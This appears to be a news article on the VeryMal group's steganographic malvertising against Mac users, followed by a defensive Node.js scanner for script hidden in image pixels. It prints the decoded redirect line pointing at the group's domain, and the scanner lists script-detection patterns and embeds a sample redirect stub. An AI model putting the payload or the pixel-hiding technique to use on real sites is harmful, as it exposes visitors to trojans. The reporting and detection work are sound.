The ads were served by a group that security firm Confiant has dubbed VeryMal, a name that comes from veryield-malyst.com, one of the ad-serving domains the group uses. A run that was active from January 11 to January 13 on about 25 of the top 100 publisher sites triggered the image as many as 5 million times a day. In an attempt to bypass increasingly effective measures available to detect malicious ads, the images used steganography—the ancient practice of hiding code, messages, or other data inside images or text—to deliver the malicious payload to Mac-using visitors.
Security provider Malwarebytes assisted Confiant in the report by providing detailed analysis of the malware.
The image, which is displayed to the right of this text, looked unremarkable. Using some clever HTML5 programming under the hood, however, it delivered malicious code to unsuspecting Mac users. VeryMal created a canvas object, which developers use to render or enhance graphics. If the computer had Mac-specific fonts installed, the code would then loop through the underlying pixel data of the image file and convert one pixel per iteration into an alphanumeric character. Once each extracted character had been appended to a text string, the result looked like this:
top.location.href = 'hxxp://veryield-malyst.com/' + volton + '?var1=' + wsw;
With that, the malvertisers had snuck the code they needed to redirect Mac users to a website that served display ads that falsely claimed the visitor’s Flash Player was out of date. Visitors who took the bait were then infected with Shlayer, a Mac trojan that came to light 11 months ago and is used to install adware.
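The decode step described above, replayed from the defender's side as an added example (this is not Confiant's or Malwarebytes' code): a small Node.js scanner that reads an ImageData-style RGBA buffer one channel at a time and flags creatives whose pixels decode to script-like text. The channel choice, the marker list and the sample buffer are assumptions, since the article does not state which channel VeryMal read.

```javascript
// Added example, not code from the article or Confiant/Malwarebytes. `data` is laid out like a
// browser ImageData.data buffer (RGBA, one byte per channel), so it runs in Node without a canvas.
// Assumption: one channel of each pixel carries one payload byte; the article does not say
// which channel VeryMal read, so all four are tried.
const CHANNELS = { r: 0, g: 1, b: 2, a: 3 };
// Decode one byte per pixel from a single channel, stopping at the first NUL byte.
function decodeChannel(data, channel) {
  let out = '';
  for (let i = channel; i < data.length; i += 4) {
    if (data[i] === 0) break;
    out += String.fromCharCode(data[i]);
  }
  return out;
}
// Markers that indicate executable script rather than image noise (assumed list).
const SCRIPT_MARKERS = [/location\.href/, /eval\(/, /document\.write/, /new Function/];
// Share of printable ASCII; genuine pixel data rarely stays inside 0x20..0x7e for long.
function printableRatio(s) {
  if (s.length === 0) return 0;
  let n = 0;
  for (const ch of s) if (ch >= ' ' && ch <= '~') n++;
  return n / s.length;
}
// Scan a buffer; return findings (channel, marker, text sample) to log or block on.
function scanImageData(data) {
  const findings = [];
  for (const [name, offset] of Object.entries(CHANNELS)) {
    const text = decodeChannel(data, offset);
    const marker = SCRIPT_MARKERS.find((re) => re.test(text));
    if (text.length >= 16 && printableRatio(text) > 0.95 && marker) {
      findings.push({ channel: name, marker: marker.source, sample: text.slice(0, 80) });
    }
  }
  return findings;
}
// Constructed sample: the red channel carries a redirect stub (defanged scheme, placeholder
// host), other channels hold plain pixel values, and a trailing all-zero pixel terminates it.
function buildSample(hidden) {
  const data = new Uint8ClampedArray(hidden.length * 4 + 4);
  for (let p = 0; p < hidden.length; p++) {
    data[p * 4] = hidden.charCodeAt(p);
    data[p * 4 + 1] = 180; data[p * 4 + 2] = 60; data[p * 4 + 3] = 255;
  }
  return data;
}

const SAMPLE = buildSample("top.location.href='hxxp://example.invalid/'");
console.log(scanImageData(SAMPLE));
```

In a page or a creative-review pipeline, the buffer would come from `ctx.getImageData(...).data` after drawing the ad image onto a canvas.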